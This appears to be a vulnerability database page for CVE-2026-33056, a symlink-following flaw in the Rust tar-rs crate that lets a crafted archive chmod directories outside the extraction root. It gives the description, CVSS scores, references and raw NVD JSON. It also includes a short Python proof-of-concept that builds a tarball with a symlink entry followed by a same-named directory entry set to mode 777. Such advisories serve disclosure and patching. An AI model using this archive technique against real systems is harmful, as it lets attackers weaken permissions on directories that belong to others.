CVE-2026-33056

Description

tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tar_project:tar:*:*:*:*:*:rust:*:* - VULNERABLE

tar-rs <= 0.4.44

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import os

# Create a malicious tarball that exploits CVE-2026-33056
# Structure:
# 1. Symlink: 'safe_dir' -> '/tmp/real_target'
# 2. Directory: 'safe_dir' (triggers chmod on the symlink target)

# Ensure a target exists for demonstration purposes
target_dir = '/tmp/real_target'
if not os.path.exists(target_dir):
    os.makedirs(target_dir)

filename = 'cve_2026_33056_poc.tar'

with tarfile.open(filename, 'w') as tar:
    # Step 1: Create a symlink entry
    # This creates a link named 'safe_dir' pointing to an external directory
    symlink_info = tarfile.TarInfo(name='safe_dir')
    symlink_info.type = tarfile.SYMTYPE
    symlink_info.linkname = target_dir 
    tar.addfile(symlink_info)
    
    # Step 2: Create a directory entry with the SAME name
    # When tar-rs processes this, it checks metadata('safe_dir').
    # Because of the bug, it follows the symlink to '/tmp/real_target'.
    # It then applies chmod to '/tmp/real_target'.
    dir_info = tarfile.TarInfo(name='safe_dir')
    dir_info.type = tarfile.DIRTYPE
    # e.g., setting permissions to 777
    dir_info.mode = 0o777 
    tar.addfile(dir_info)

print(f"[+] Created exploit archive: {filename}")
print(f"[+] Extracting this with vulnerable tar-rs will chmod {target_dir}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33056
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33056
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33056/
[4] VulDB https://vuldb.com/cve/CVE-2026-33056
[5] https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446
[6] https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33056", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:11.603", "lastModified": "2026-03-24T16:17:11.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45."}, {"lang": "es", "value": "tar-rs es una biblioteca de lectura/escritura de archivos tar para Rust. En las versiones 0.4.44 e inferiores, al desempaquetar un archivo tar, la función `unpack_dir` del crate `tar` utiliza `fs::metadata()` para verificar si una ruta que ya existe es un directorio. Debido a que `fs::metadata()` sigue los enlaces simbólicos, un tarball manipulado que contiene una entrada de enlace simbólico seguida de una entrada de directorio con el mismo nombre hace que el crate trate el destino del enlace simbólico como un directorio existente válido y, posteriormente, le aplique `chmod`. Esto permite a un atacante modificar los permisos de directorios arbitrarios fuera de la raíz de extracción. Este problema ha sido solucionado en la versión 0.4.45."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tar_project:tar:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.4.45", "matchCriteriaId": "6F3757EC-A7DB-41C4-A2CC-6D4BC1F59573"}]}]}], "references": [{"url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory", "Exploit"]}]}}